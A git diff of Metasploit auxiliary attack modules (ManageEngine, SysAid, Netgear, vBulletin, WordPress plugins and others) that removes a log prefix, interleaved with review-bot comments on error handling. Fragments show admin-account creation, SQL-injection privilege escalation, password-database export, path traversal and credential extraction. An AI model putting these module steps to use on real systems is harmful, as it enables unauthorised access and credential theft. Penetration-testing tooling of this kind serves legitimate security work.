@@ -94,15 +94,15 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 if check_login("admin") - print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password") + print_good("Expected answer and the login was successful. Try to login with the user admin and a blank password") else - print_status("#{peer} - Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") + print_status("Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") end else - print_error("#{peer} - Unexpected answer. Exploit attempt has failed") + print_error("Unexpected answer. Exploit attempt has failed") end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end end diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 06f5ffceca..871d6c8830 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary # Yes, "sucess" is really mispelt, as is "Servelet" ... ! unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/ - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end - print_good("#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index cf33a28787..9d782c370c 100644 
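Review bot: In the manage_engine_dc_create_admin.rb hunk (`@@ -65,10 +65,10 @@`) the failure branch prints "Administrator account creation failed" but does not leave the method. Execution falls through to `print_good("Created Administrator account with credentials ...")` and to the `service_data` credential record that follows. Add a `return` after the `print_error` so a failed request is not reported and stored as a working credential. The rest of the method lies outside the hunk.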
--- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -182,14 +182,14 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 else cookie = get_cookie end if cookie.nil? - print_error("#{peer} - Failed to get application cookies!") + print_error("Failed to get application cookies!") return end @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Listing directory #{datastore['DIRECTORY']}") + print_status("Listing directory #{datastore['DIRECTORY']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File with directory listing saved in: #{path}") else - print_error("#{peer} - Failed to list directory.") + print_error("Failed to list directory.") end end end 
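Review bot: `rescue Rex::ConnectionRefused` in the `@@ -216,7 +216,7 @@` hunk handles only a refused connection. A timeout or an unreachable host would presumably leave `run` as an unhandled exception instead of producing the "Could not connect." message. Other modules in this patch (netflow_file_download.rb, linksys_tmunblock_admin_reset_bof.rb) rescue the broader `Rex::ConnectionError`, so use `rescue Rex::ConnectionError` here too. The same narrow rescue appears in manageengine_file_download.rb (`@@ -212,7 +212,7 @@`) and sysaid_file_download.rb (`@@ -86,7 +86,7 @@`). The `begin` opens in the preceding hunk.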
diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index 49331f2752..fe04617a13 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 if cookie.nil? - print_error("#{peer} - Failed to login to IT360!") + print_error("Failed to login to IT360!") return end else @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end 
@@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or is empty.") + print_error("0 bytes returned, file does not exist or is empty.") return end @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5fa29d0f9c..0dc6890946 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary def run unless check == Exploit::CheckCode::Appears - print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + print_error("Fingerprint hasn't been successful, trying to exploit anyway...") end version = get_version @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary creds = inject_sql(version < 7000 ? true : false) username = creds[0] password = creds[1] - print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + print_good("Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) @@ -241,10 +241,10 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_status("#{peer} - Reporting Super Administrator credentials...") + print_status("Reporting Super Administrator credentials...") report_super_admin_creds(username, password) - print_status("#{peer} - Leaking Password database...") + print_status("Leaking Password database...") loot_passwords(cookie_su) end 
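Review bot: In manageengine_pmp_privesc.rb (`@@ -241,10 +241,10 @@`) the `fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, ...")` call keeps the explicit `#{peer} - ` prefix that this patch strips from every `print_*` call around it. If `fail_with` does not receive the same automatic prefix, that is worth a comment, for example `# fail_with is not auto-prefixed with the peer, keep it here`. Otherwise the prefix should go as well, so the operator log does not show the target twice. Nothing in this hunk shows which case applies.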
@@ -308,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + print_good("Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' loot_type = 'text/csv' loot_filename = 'manageengine_pmp_password_db.csv' @@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary res.body, loot_filename, loot_desc) - print_status("#{peer} - Password database saved in: #{p}") + print_status("Password database saved in: #{p}") else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") + print_error("Failed to export Password Manager Pro passwords.") end end end diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 23df8b7b73..d42ee31992 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Copying file to Web location...") + print_status("Copying file to Web location...") dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" res = send_request_cgi( 
@@ -86,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} copied to #{dst_path} successfully") + print_good("File #{file} copied to #{dst_path} successfully") else - print_error("#{peer} - Failed to copy #{file} to #{dst_path}") + print_error("Failed to copy #{file} to #{dst_path}") end - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -101,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end # Cleanup @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 8e147f4927..5b920ae2c0 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb 
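Review bot: In `read_file` (hunk `@@ -86,12 +86,12 @@`) a failed copy is reported with `print_error("Failed to copy #{file} to #{dst_path}")`, yet the method goes straight on to "Retrieving file contents..." and can save whatever the second request returns as loot. Stop after the error, for example `return` in the `else` branch, so that the stored loot always corresponds to the requested file. The start of the method and the cleanup step after the retrieval are outside this hunk; check that an early return does not skip cleanup that is still needed.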
@@ -46,21 +46,21 @@ class Metasploit3 < Msf::Auxiliary def run # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'), 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }, }) rescue Rex::ConnectionError - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end # Show data if needed if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") + print_error("0 bytes returned, file does not exist or it is empty.") return end vprint_line(res.body.to_s) @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index 9158af9b7e..f7e8ee50c1 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb 
@@ -44,16 +44,16 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to access the configuration of the device") + print_status("Trying to access the configuration of the device") # extract device details action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' - print_status("#{peer} - Extracting Firmware version...") + print_status("Extracting Firmware version...") extract_data(action) # extract credentials action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo' - print_status("#{peer} - Extracting credentials...") + print_status("Extracting credentials...") extract_data(action) end @@ -75,26 +75,26 @@ class Metasploit3 < Msf::Auxiliary return if res.headers['Server'] !~ /Linux\/2.6.15 uhttpd\/1.0.0 soap\/1.0/ if res.body =~ /<NewPassword>(.*)<\/NewPassword>/ - print_status("#{peer} - Credentials found, extracting...") + print_status("Credentials found, extracting...") extract_credentials(res.body) end if res.body =~ /<ModelName>(.*)<\/ModelName>/ model_name = $1 - print_good("#{peer} - Model #{model_name} found") + print_good("Model #{model_name} found") end if res.body =~ /<Firmwareversion>(.*)<\/Firmwareversion>/ firmware_version = $1 - print_good("#{peer} - Firmware version #{firmware_version} found") + print_good("Firmware version #{firmware_version} found") #store all details as loot loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body) - print_good("#{peer} - Device details downloaded to: #{loot}") + print_good("Device details downloaded to: #{loot}") end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary body.each_line do |line| if line =~ /<NewPassword>(.*)<\/NewPassword>/ pass = $1 - print_good("#{peer} - admin / #{pass} credentials found") + print_good("admin / #{pass} credentials found") service_data = { address: rhost, 
@@ -137,6 +137,6 @@ class Metasploit3 < Msf::Auxiliary # store all details as loot loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body) - print_good("#{peer} - Account details downloaded to: #{loot}") + print_good("Account details downloaded to: #{loot}") end end diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 8a7c25a70e..6a12988779 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Trying to delete #{datastore['RPATH']}...") + print_status("Trying to delete #{datastore['RPATH']}...") res = send_request_cgi( { @@ -57,9 +57,9 @@ class Metasploit3 < Msf::Auxiliary }, 5) if res and res.code == 200 and res.body =~ /<RESULT><VERSION>1<\/VERSION><STATUS>0<\/STATUS><TRANSID>0<\/TRANSID><\/RESULT>/ - print_good("#{peer} - File #{datastore['RPATH']} successfully deleted") + print_good("File #{datastore['RPATH']} successfully deleted") else - print_error("#{peer} - File not deleted") + print_error("File not deleted") end end diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index d95a6c2802..ee19d364b1 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << file travs << "%00" - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { 
@@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") + print_status("Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") if is_proficy? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found") + print_error("Sophos Web Protect Appliance vulnerable component not found") return end contents = read_file(datastore['FILEPATH']) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index be790a49dd..ed9226caa4 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.code == 200 && res.body.to_s =~ /Error while creating account/ # No way to know whether this worked or not, it always says error - print_status("#{peer} - The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") + print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") service_data = { address: rhost, port: rport, @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) else - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end end end 
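Review bot: The fingerprint helper called in `run` is named `is_proficy?`, although the messages around it are about the Sophos Web Protect Appliance. The name looks carried over from another module and misleads anyone reading the check. Rename it to describe what it detects, for example `sophos_wpa?`, which also drops the `is_` prefix that Ruby predicates normally omit. The definition is outside this hunk and would need the same rename.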
diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index e11ccfc8ae..f010b3f631 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end def get_traversal_path - print_status("#{peer} - Trying to find out the traversal path...") + print_status("Trying to find out the traversal path...") large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary }, }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.') end - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/ file_path = $3 else @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary traversal_path = get_traversal_path if traversal_path.nil? - print_error("#{peer} - Could not get traversal path, using bruteforce to download the file") + print_error("Could not get traversal path, using bruteforce to download the file") count = 1 while count < 15 res = download_file(('../' * count) + file_path) diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 7a219171e5..308d928a81 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb 
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end - print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") + print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index b9efc4ae7f..bba990712d 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -79,11 +79,11 @@ class Metasploit3 < Msf::Auxiliary def run if user == pass - print_error("#{peer} - Please select a password different than the username") + print_error("Please select a password different than the username") return end - print_status("#{peer} - Trying a new admin vBulletin account...") + print_status("Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /Administrator account created/ - print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") + print_good("Admin account with credentials #{user}:#{pass} successfully created") report_cred( ip: rhost, port: rport, @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary proof: res.body ) else - print_error("#{peer} - Admin account creation failed") + print_error("Admin account creation failed") end end end diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index b86b2ee014..21cb5b66ce 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb 
@@ -93,13 +93,13 @@ class Metasploit3 < Msf::Auxiliary username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) - print_status("#{peer} - Trying to get table_prefix") + print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? - print_error("#{peer} - Unable to get table_prefix") + print_error("Unable to get table_prefix") return else - print_status("#{peer} - got table_prefix '#{table_prefix}'") + print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s - print_status("#{peer} - Inserting user #{username} with password #{password}") + print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # login successfull if cookie - print_status("#{peer} - User #{username} with password #{password} successfully created") + print_status("User #{username} with password #{password} successfully created") report_cred( ip: rhost, port: rport, @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary proof: cookie ) else - print_error("#{peer} - User creation failed") + print_error("User creation failed") return end end diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 2a8c26fba6..4051e0baa5 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb 
@@ -65,44 +65,44 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") elsif res.code != 200 - vprint_warning("#{peer} - Server responded with status code #{res.code}") + vprint_warning("Server responded with status code #{res.code}") end res end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) if cookie.nil? - print_error("#{peer} - Failed to authenticate with WordPress") + print_error("Failed to authenticate with WordPress") return end - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? - print_error("#{peer} - Failed to change the admin e-mail address") + print_error("Failed to change the admin e-mail address") return end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? - print_error("#{peer} - Failed to enable user registrations") + print_error("Failed to enable user registrations") return end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? 
- print_error("#{peer} - Failed to set the default user role") + print_error("Failed to set the default user role") return end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 2fada64417..25c01c9f28 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary def set_wp_option(name, value, cookie) encoded_value = serialize_and_encode(value) if encoded_value.nil? - vprint_error("#{peer} - Failed to serialize #{value}.") + vprint_error("Failed to serialize #{value}.") else res = send_request_cgi( 'method' => 'POST', @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") else - vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_warning("Server responded with status code #{res.code}") if res.code != 200 end return res 
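Review bot: `set_wp_option` in wp_easycart_privilege_escalation.rb (hunk `@@ -65,44 +65,44 @@`) only logs a non-200 status with `vprint_warning` and then returns `res` anyway. `run` tests each call with `.nil?`, so a rejected request still ends in "Privilege escalation complete". Return nil on failure instead, for example by ending the method with `res if res && res.code == 200`; if the endpoint signals success with another status, accept that code explicitly. wp_wplms_privilege_escalation.rb has the same pattern (`@@ -87,9 +87,9 @@`, checked by `fail_with` in `@@ -97,29 +97,29 @@`). The start of `set_wp_option` is outside the hunk.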
@@ -97,29 +97,29 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address') end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations') end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to set the default user role') end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 0ef51aa38a..170a40091e 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb 
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to connect and check endianess...") + print_status("Attempting to connect and check endianess...") @endianess = fingerprint_endian @credentials = {} @@ -72,18 +72,18 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to check endianess, aborting...") return end - print_good("#{peer} - #{string_endianess} device found...") + print_good("#{string_endianess} device found...") - print_status("#{peer} - Attempting to connect and dump configuration...") + print_status("Attempting to connect and dump configuration...") config = dump_configuration if config.nil? - print_status("#{peer} - Error retrieving configuration, aborting...") + print_status("Error retrieving configuration, aborting...") return end loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations") - print_status("#{peer} - Router configuration dump stored in: #{loot_file}") + print_status("Router configuration dump stored in: #{loot_file}") parse_configuration(config[:data]) end @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary disconnect if res.blank? - vprint_error("#{peer} - No answer...") + vprint_error("No answer...") return end @@ -186,17 +186,17 @@ class Metasploit3 < Msf::Auxiliary end unless mark == 0x4d4d6353 - vprint_error("#{peer} - Incorrect mark when reading response") + vprint_error("Incorrect mark when reading response") return nil end unless zero == 0 - vprint_error("#{peer} - Incorrect zero when reading response") + vprint_error("Incorrect zero when reading response") return nil end unless length == data.length - vprint_warning("#{peer} - Inconsistent length / data packet") + vprint_warning("Inconsistent length / data packet") # return nil end 
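Review bot: In sercomm_dump_config.rb (`@@ -72,18 +72,18 @@`) the abort path for a missing configuration uses `print_status("Error retrieving configuration, aborting...")`. The endianness failure a few lines above uses `print_error`. Use `print_error` here as well so that both aborts are shown as failures in the console output.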
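Review bot: In the response parser (`@@ -186,17 +186,17 @@`) a length mismatch only triggers `vprint_warning("Inconsistent length / data packet")`, and the `# return nil` below it is commented out with no explanation. The data is therefore still returned and, in `run`, stored as loot and parsed for credentials. Either restore the `return nil` or replace the dead line with a comment giving the reason, such as `# some devices report a wrong length; keep the data anyway`, if that is the intent. The method starts outside this hunk.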
